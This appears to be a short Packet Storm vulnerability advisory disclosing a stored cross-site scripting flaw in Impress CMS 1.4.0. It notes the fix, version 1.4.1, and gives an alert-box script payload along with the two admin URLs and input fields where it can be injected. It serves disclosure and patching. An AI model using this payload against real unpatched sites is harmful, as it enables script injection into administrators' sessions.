Impress CMS 1.4.0 Cross Site Scripting

Impress CMS version 1.4.0 suffers from a cross site scripting vulnerability.


MD5 | 029b019e3aee7ed3d4048cb1c2d4d9a0

Download
#Author: AppleBois
#Homepage: https://sourceforge.net/projects/impresscms/
#Affected Version: 1.4.0
#Stored XSS
#Allows an attacker to execute arbitrary HTML and JavaScript code
#Solution: Update to 1.4.1 
#More information : https://github.com/ImpressCMS/impresscms/issues/659

Payload = <script>alert('AppleBois');</script>

Vulnerable URL :modules/system/admin.php?fct=adsense&op=mod&adsenseid=4
Vulnerable TextBar : ID of the [adsense tag to display this ad]

Vulnerable URL :/modules/system/admin.php?fct=customtag&op=mod
Vulnerable TextBar : Name

Source: packetstormsecurity.com
Related Posts